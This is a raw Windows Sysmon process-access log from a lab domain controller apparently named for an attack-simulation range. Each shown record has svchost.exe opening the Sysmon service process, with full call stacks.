12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
